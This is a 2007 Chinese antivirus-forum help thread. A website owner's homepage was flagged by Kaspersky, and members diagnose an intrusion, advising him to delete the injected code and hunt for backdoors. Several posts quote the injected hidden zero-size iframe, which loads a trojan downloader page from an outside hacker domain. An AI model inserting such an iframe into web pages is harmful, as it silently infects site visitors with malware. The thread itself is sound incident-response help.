瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【求助】好长时间没来了,请大家帮我看一下这个怎么解决,谢谢。

1   1  /  1  页   跳转

【求助】好长时间没来了,请大家帮我看一下这个怎么解决,谢谢。

收藏
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-14 17:07 | 只看楼主 短消息 资料
字号: 1楼

【求助】好长时间没来了,请大家帮我看一下这个怎么解决,谢谢。


感谢大家的帮助,我已经处理结束了。。。。哈哈,这下不怕它了!

处理过程:

有和我相同的情况的人,可以参考一下:
打开index.htmlIndex.asp可以在最下面一行发现这个代码的,删除了就行了!

附原文:
我在朋友家的一台机上上网时,他家装的是KIS6.0,但是,我在上我自己的网站时,却发现……

已检测到: 木马程序 Trojan-Downloader.HTML.Agent.bx    URL: http://www.hack99.cn/hack/xuehu.htm

我闷呢,这个网站明明是一个短信网站,我想可能是某个地方有问题,可找到现在没找到呀。。。。

网站:是签名有,偶就不弄了。。。。

PS:听说好像只有卡巴斯基6.0版出现这个耶,好像是主动防御吧,我也不知,我没用这软件的。
我只想清除了这个,这样,省得别人访问也出现那句话,先谢谢大家了!


。。。。。。不怕不怕,会的人就帮我一下。
最后编辑2007-02-24 17:44:13.500000000
分享到:
gototop
 
hotboy
头像
社区嘉宾
  • 帖子:27670
  • 注册: 2002-02-01
  • 来自:东厂
卡卡风雨同舟勋章论坛8周年活动礼物卡卡名人堂论坛9周年纪念冰激凌十周年
发表于: 2007-02-14 17:17 | 短消息 资料
字号: 2楼

<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
gototop
 
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-14 17:18 | 只看楼主 短消息 资料
字号: 3楼

你也出现了?!怎么解决呀,我就是没找到。。。。。真不知是哪个弄的,哭死
gototop
 
网络骑士HKC
头像
初生襁褓狮
  • 帖子:157
  • 注册: 2007-02-13
  • 来自:
发表于: 2007-02-14 17:21 | 短消息 资料
字号: 4楼

你的网站是被人入侵了
主页文件被别人插了句代码:
<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
删掉就可以了

他用的雪狐的模板
估计在你的网站上还留有后门
好好找找吧,一般从文件的修改日期上可以看出来的
gototop
 
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-14 17:26 | 只看楼主 短消息 资料
字号: 5楼

引用:
【网络骑士HKC的贴子】你的网站是被人入侵了
主页文件被别人插了句代码:
<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
删掉就可以了

他用的雪狐的模板
估计在你的网站上还留有后门
好好找找吧,一般从文件的修改日期上可以看出来的
………………


偶也看到了呀。。。我用的是动易的,到现在还没找到。
gototop
 
网络骑士HKC
头像
初生襁褓狮
  • 帖子:157
  • 注册: 2007-02-13
  • 来自:
发表于: 2007-02-14 17:35 | 短消息 资料
字号: 6楼

用思易找找吧,这玩意“贼的好使”
http://down.chinaz.com/S/12078.asp

顺便翻翻IIS日志看看他是怎么进去的
gototop
 
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-14 17:39 | 只看楼主 短消息 资料
字号: 7楼

引用:
【网络骑士HKC的贴子】用思易找找吧,这玩意“贼的好使”
http://down.chinaz.com/S/12078.asp

顺便翻翻IIS日志看看他是怎么进去的
………………


这个翻日志就不用了。。。。偶不会,再说这个空间是用的2008sh.com的。。。偶不是小马哦,只是说明情况的

偶再试试。。。。。
gototop
 
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-14 19:30 | 只看楼主 短消息 资料
字号: 8楼

。。。。。偶还没弄好。。。。
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-02-15 17:23 | 短消息 资料
字号: 9楼

引用:
【只有我的贴子】偶还是没有弄好,有没有帮我的,谢谢。

我在朋友家的一台机上上网时,他家装的是KIS6.0,但是,我在上我自己的网站时,却发现……

已检测到: 木马程序 Trojan-Downloader.HTML.Agent.bx    URL: http://www.hack99.cn/hack/xuehu.htm

我闷呢,这个网站明明是一个短信网站,我想可能是某个地方有问题,可找到现在没找到呀。。。。

网站:是签名有,偶就不弄了。。。。

PS:听说好像只有卡巴斯基6.0版出现这个耶,好像是主动防御吧,我也不知,我没用这软件的。
我只想清除了这个,这样,省得别人访问也出现那句话,先谢谢大家了!


。。。。。。不怕不怕,会的人就帮我一下。
………………

那网页有个木马下载器
瑞星最新病毒库已经能杀

附件附件:

下载次数:214
文件类型:image/pjpeg
文件大小:
上传时间:2007-2-15 17:23:21
描述:
预览信息:EXIF信息
gototop
 
只有我
头像
自信弱冠狮
  • 帖子:360
  • 注册: 2004-12-15
  • 来自:
发表于: 2007-02-24 17:44 | 只看楼主 短消息 资料
字号: 10楼


感谢大家的帮助,我已经处理结束了。。。。哈哈,这下不怕它了!

处理过程:

有和我相同的情况的人,可以参考一下:
打开index.htmlIndex.asp可以在最下面一行发现这个代码的,删除了就行了!
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT